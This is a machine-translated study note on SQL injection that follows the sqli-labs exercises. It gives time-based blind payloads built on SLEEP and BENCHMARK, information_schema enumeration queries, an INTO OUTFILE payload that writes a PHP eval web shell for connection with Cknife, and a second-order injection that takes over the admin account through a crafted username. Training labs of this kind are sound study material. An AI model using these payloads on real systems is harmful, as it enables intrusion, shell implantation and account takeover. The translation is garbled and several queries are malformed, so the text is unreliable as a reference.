delay injection, delay injection each database has a different delay function
and If (ASCII (substr (), =105,1,sleep (5))--+
This is the delay injection of MySQL, when ASCII (substr (Database (), =105 ) is true, returns 1for false execution Sleep (5), there will be 5 seconds of delay error
function that repeats the specified action
The BENCHMARK (count,expr) function repeats the expression expr count times , and then returns the execution time. This function can be used to determine the speed of the MySQL processing expression.
UNION SELECT (IF (SUBSTRING) =char (current,1,1), BENCHMARK (50000000,encode (' MSG ', ' by 5 seconds '), null)), 2,3 from ( Select Database () as current) as tb1--+
1 trunc(value,precision) by Precision(Precision)Intercept a number,No rounding operations are performed.
2 Round(value,precision) based on the given accuracy(Precision)Enter a value.
3 Ceil (value)produces a value greater than or equal to the specified (value) is the smallest integer.
4 floor(value) andCeil() Instead, produces a value that is less than or equal to the specified (value) is the smallest integer.
5 sign (value)and the absolute value functionABS() instead. ABS() is given the amount of the value rather than its symbol,Sign (value)The symbol for the value is given instead of the quantity.
This is an explanation of the common functions of truncated strings http://www.cnblogs.com/lcamry/p/5504374.html
here are some explanations for the blinds . http://www.cnblogs.com/lcamry/p/5763129.html
Mysql file Import and export http://www.cnblogs.com/lcamry/p/5763111.html
Loadfile Common path http://www.cnblogs.com/lcamry/p/5729087.html
UNION SELECT, ' <?php @eval ($_post["Mima"])?> ' into outfile ' c:\\wamp\\www\\sqllib\\less-7\\yijuhua.php '--+
Import a Word trojan, if there is permission, after import can be connected with Cknife
an experiment of experiment bar :http://jxust.shiyanbar.com/course/50978/vid/1502
The mysql_real_escape_string () function escapes special characters in strings used in SQL statements.
The following characters are affected:
Get database name
Select schema_name from Information_schema.schemata
Get table name
Select table_name from Information_schema.tables from where
Table_name= ' schema_name '
Get Column Name
Select column_name from Information_schema.columns where table_name= ' table_name '
Get content
Select ' column_name ' from Schema_name.table_name
Sqlilabs 's Less-24 has experienced the next two injections
Register to create an account with admin ' # , password is 123
you can make a change to the password, and when you change the password, two injections will occur, because # will update the query with the following comment
can see by changing the admin ' # user's password, the result changed the password of the admin , then we can be set by the password to login to the administrator account, but also a and this has the same effect is SQL constraint attacks, but also can be disguised login administrator password, and do not need the original administrator password, of course, the administrator account needs to know
SQL Injection Learning Note 4